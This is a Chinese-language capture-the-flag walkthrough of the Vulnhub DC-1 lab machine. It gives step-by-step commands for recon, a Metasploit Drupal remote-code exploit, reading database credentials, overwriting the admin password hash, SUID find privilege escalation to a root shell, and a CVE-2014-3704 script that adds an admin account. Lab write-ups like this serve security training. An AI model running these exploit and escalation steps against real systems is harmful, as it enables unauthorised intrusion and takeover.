【Vulnhub靶机系列】DC1

  • A+
所属分类:安全文章

点击标题下「蓝色微信名」可快速关注

文章来源|MS08067 安全实验室

本文作者:大方子(Ms08067实验室核心成员)


基本信息

Kali:192.168.56.116

DC1:192.168.56.115

实验过程

现在Kali中使用arp-scan进行主机探活

sudo arp‐scan ‐‐interface=eth1 192.168.56.0/24

【Vulnhub靶机系列】DC1

逐个排查发现DC1的IP地址为192.168.56.115

然后使用nmap对主机进行探测

nmap ‐sC ‐sV ‐A ‐oA vulnhub/DC1/DC1 192.168.56.115

【Vulnhub靶机系列】DC1

主机分开开了:22,80,111端口

我们先从80端口入手

【Vulnhub靶机系列】DC1

可以发现网站是Drupal cms管理系统

我们启动msf,搜索下Drupal可用的EXP

msf > search Drupal

【Vulnhub靶机系列】DC1

这里我们选用exploit/unix/webapp/drupal_drupalgeddon2

因为他是最新的,而且品质为excellent

msf6 > use exploit/unix/webapp/drupal_coder_execmsf6 exploit(unix/webapp/drupal_coder_exec) > show optionsmsf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.115msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.116msf6 exploit(unix/webapp/drupal_coder_exec) > run

【Vulnhub靶机系列】DC1

这样我们就可以成功得到一个会话

我们用会话返回一个shell

【Vulnhub靶机系列】DC1

发现flag1.txt

【Vulnhub靶机系列】DC1

查看下flag1.txt内容

【Vulnhub靶机系列】DC1

给我们一个提示 Every good CMS needs a config file - and so do you.

百度drupal配置文件的位置

【Vulnhub靶机系列】DC1

sites/default/files

【Vulnhub靶机系列】DC1

里面可以看到数据库的账号密码,同时我们还可以看到flag2的内容说:爆破不是唯一获得访问权限方法

'database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t',

【Vulnhub靶机系列】DC1

那么我们用获得数据库的账号密码登录下数据看看

这里需要注意的是,我们需要用python转换成标准的shell

否则就会出现下面的场景,进入mysql之后

shell就没有反应

【Vulnhub靶机系列】DC1

我们输入

python ‐c "import pty;pty.spawn('/bin/bash')"

【Vulnhub靶机系列】DC1

mysql> show databases;mysql> use drupaldb;mysql> show tables;mysql> select * from users;mysql> select name,pass from users;

【Vulnhub靶机系列】DC1

这里的密码是经过drupal加密

在scripts的文件夹中有用来算密码的脚本但是因为靶机的环境原因会报错

【Vulnhub靶机系列】DC1

网上找了下,直接用别人算好的hash进行替换

明文:password密文:$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

【Vulnhub靶机系列】DC1

接下来我们把管理员的密码重置下

mysql> update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'where name='admin';

【Vulnhub靶机系列】DC1

然后进行登录

【Vulnhub靶机系列】DC1

然后发现flag3

【Vulnhub靶机系列】DC1从flag3的内容可以看出,提示我们需要用find提权同时我们也可以在家目录中找到flag4

【Vulnhub靶机系列】DC1

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?

我们使用find找下具有root权限的suid


# ‐perm 按照文件权限来查找文件# ‐u=w 基于用户可写查找# ‐type f 查找普通类型文件find / ‐perm ‐u=s ‐type f 2>/dev/null


【Vulnhub靶机系列】DC1

可以看到find是可以用来提权的

我们尝试用find执行命令


# 这里需要注意‐name参数填写的文件名,是需要系统真实存在的www‐[email protected]‐1:/home/flag4$ find / ‐name flag4 ‐exec "whoami" ;

【Vulnhub靶机系列】DC1

那么我们接下来用find提权

www‐[email protected]‐1:/home/flag4$ find / ‐name flag4 ‐exec "/bin/sh" ;


【Vulnhub靶机系列】DC1

这样我们就拿到最终的flag


额外内容


使用CVE2014-3704添加管理账号

在exploit-db中有可以直接利用的EXP,可以直接添加管理账号地址:https://www.exploit-db.com/exploits/34992 我们在Kali上开启HTTP服务,让靶机从Kali上下载EXP

【Vulnhub靶机系列】DC1

然后我们通过这个EXP创建管理账号

www‐[email protected]‐1:/var/www$ python 34992.py ‐t http://192.168.56.115/ ‐u dfz ‐p ms08067


【Vulnhub靶机系列】DC1

然后就可以正常登录

【Vulnhub靶机系列】DC1

另一种查询具有root权限命令的find语句


find / ‐user root ‐perm ‐4000 ‐print 2>/dev/null

【Vulnhub靶机系列】DC1


【Vulnhub靶机系列】DC1



扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

【Vulnhub靶机系列】DC1 【Vulnhub靶机系列】DC1

【Vulnhub靶机系列】DC1【Vulnhub靶机系列】DC1

【Vulnhub靶机系列】DC1 【Vulnhub靶机系列】DC1

目前40000+人已关注加入我们

【Vulnhub靶机系列】DC1


本文始发于微信公众号(Ms08067安全实验室):【Vulnhub靶机系列】DC1

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:1   其中:访客  0   博主  0

    • bowman 3

      学习了